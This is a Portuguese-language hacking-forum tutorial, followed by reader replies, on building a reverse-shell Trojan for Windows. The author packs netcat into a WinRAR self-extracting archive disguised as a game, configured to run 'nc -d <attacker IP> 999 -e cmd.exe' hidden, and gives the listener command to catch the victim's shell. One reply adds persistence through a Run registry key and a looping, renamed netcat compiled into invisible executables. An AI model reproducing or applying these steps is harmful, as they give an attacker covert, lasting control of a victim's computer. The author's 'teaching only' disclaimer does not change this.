::: Introdução :::
O Netcat é uma ferramenta muito cobiçada. Ele pode ser utilizado desde simples funções de telnet, até um backdoor de conexão reversa. Por estas diversas funções, é conhecido também como um "Canivete Suiço" hacker. Na maioria dos sistemas operacionais Linux, o Netcat já vem incluso.
Tendo criatividade, pode-se utilizá-lo como diversas técnicas, entre elas um sniffer e até um brute force!
Nesta matéria iremos criar um backdoor de conexão reversa, que nos dará acesso à shell, ou seja, o cmd.exe! Também configuraremos um arquivo SFX, o qual conterá o netcat e o comando após a execução, que será mandado para a vítima como se fosse um servidor.
::: Ferramentas Necessárias :::
Para a matéria serão necessárias as seguintes ferramentas:
Netcat: http://joncraton.org/files/nc111nt.zip (http://joncraton.org/files/nc111nt.zip)
Winrar: http://www.baixaki.com.br/download/WinRAR.htm (http://www.baixaki.com.br/download/WinRAR.htm)
::: Instalando o Netcat :::
Para instalar o Netcat, basta extrair os arquivos para a pasta C:\Windows\System32\
Para chamá-lo, basta ir ao cmd e digitar nc + os comandos
::: O Servidor :::
Após você ter baixado e instalado as ferramentas necessárias, vamos criar o arquivo SFX, o nosso servidor.
Para isto, selecione o arquivo nc.exe, e com o botão direito do mouse, clique em Adicionar para o arquivo...
(http://img51.imageshack.us/img51/300/sfx1.png)
Em Nome do arquivo, escolha um nome para o arquivo (sem tirar a extensão), no meu caso coloquei "Game". Depois no canto inferioro direito, marque a opção Criar arquivo SFX.
(http://img691.imageshack.us/img691/671/sfx2.png)
Depois, na aba Avançado clique em Opções SFX...
(http://img59.imageshack.us/img59/7189/sfx3.png)
Irá abrir a janela Opções avançadas do SFX. Na aba Geral siga os seguintes procedimentos. No campo de texto Caminho para extração digite C:\Windows\System32\ que é o diretório para instalar o netcat. Depois, no campo de texto Executar após a extração digite:
nc -d 127.0.0.1 999 -e cmd.exe
Agora vamos explicar...
O comando -d fará o netcat rodar em modo background
Onde eu coloquei 127.0.0.1 você deverá colocar seu ip
O 999 é a porta utilizada, que poderá ser a sua escolha
O comando -e cmd.exe fará executar o cmd.exe ao ser executado... ou seja, você oberá a shell da vítima.
(http://img705.imageshack.us/img705/6922/sfx4.png)
Na aba Métodos marque a opção Ocultar tudo
(http://img190.imageshack.us/img190/4526/sfx5.png)
Depois, na aba Atualizar em Método de atualização marque Extrair e substituir arquivos. Mais embaixo, em Métodos de substituição marque a opção Substituir todos os arquivos
(http://img16.imageshack.us/img16/3501/sfx6.png)
Agora podemos personalizar um pouco nosso servidor. Para isto iremos modificar o ícone... Na aba Texto e Ícone em cima do campo de texto Carregar ícone SFX do arquivo clique no botão Procurar para procurar o ícone. No meu caso utilizarei um dado :)
(http://img706.imageshack.us/img706/6721/sfx7.png)
Agora que terminamos de configurar o SFX podemos clicar no OK para aplicarmos as configurações e novamente em OK para criarmos o arquivo!
Podem ver no desktop que foi criado o arquivo Game.sfx!
Pronto, temos o servidor pronto!
::: Cliente :::
Agora que nosso servidor está pronto, temos que deixar o Netcat em escuta na porta que escolhemos no servidor. No meu caso foi a porta 999.
Para isto, devemos abrir o cmd, e digitar:
nc -L -n -p 999 -vv
Vamos explicar agora o código!
O comando -L irá entrar em modo de escuta, e se a conexão encerrar, tentará reconectar.
O comando -n determina que pode ser utilizado apenas números.
O -p 999 é para determinar a porta.
O -vv é para preparar a conexao quando fexada.
Depois de deixar o netcat em modo de escuta na porta 999 irá aparecer a seguinte mensagem:
Listenning on [any] 999...
Abaixo tem a imagem demonstrando.
(http://img704.imageshack.us/img704/6676/cmdh.png)
Feito isso, você pode enviar para a vítima o arquivo SFX, e então terá acesso ao cmd dela :)
::: Conclusão :::
Nesta matéria vocês aprenderam como criar um simples backdoor de conexão reversa utilizando o Netcat. Devo lembrar, que como ele utiliza conexão reversa deverá ser necessário abrir a porta que será utilizada, em seu roteador, ou modem. Esta foi apenas uma demonstração de uma das muitas funções desta incrivel ferramenta que é o Netcat! A matéria foi utilizada em um Windows, mas tem como fazer backdoor's para Linux também utilizando o Netcat.
Criei esta matéria com o intuíto de ensinar, e não de estimular qualquer ação!
Bem, espero que vocês tenham gostado!
Autor: Rahackzin
fiquei tao emocionado que acho q vc merece um bjo na bunda !
habla serio ...
Vlw otimo tuto
Mesmo sendo uma técnica meio antiga, que nem funciona mais em sistemas atualizados, valeu o post, pois ela ainda pode servir, se pessoas que forem usar usem criatividade a mais :D :D :D
Boa iniciativa mais eu fiquei tenso quando li isso (já perdi a conta de ver esse "tutorial ráquer"). :-X
legal, bem interessante :)
1º - isso só var dar acesso na hora se desconecar ja era, se vc quiser se conectar de novo não da mais!!
2º - e se a pasta do windows não estiver no C?
________________
eu fiz o seguinte:
fiz um bat chamado updte, assim.
@echo off
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Wins /f /t REG_SZ /d "%windir%\winst.exe -autorun"
del updte.exe
"winst.exe" no final da chave é o nome de outro bat com o seguinte codigo
@echo off
title winsist
:loop
winsist nº-do-seu-ip porta -e cmd.exe
cls
goto loop
mudei o nome do nc para winsist
compilei os bats com o BatToExeConverter marcando a opção para deixar invisivel
Opções avançadas do SFX, no campo de texto caminho para extração coloquei %windir%
no campo de texto executar após a extração coloquei updte.exe
%windir% é uma variavel de ambiente do windows que indica o pasta do windows
Assim toda vez que a vitima ligar o pc vai rodar o "winst.exe" que é o bat compilado
ai é so você deixar o nc em escuta no seu pc e pronto
se você se desconectar não tem problema o "winst.exe" vai continuar rodando, ai é só se conectar denovo
você pode se conectar a qualquer hora.
muito bom
muito obrigado !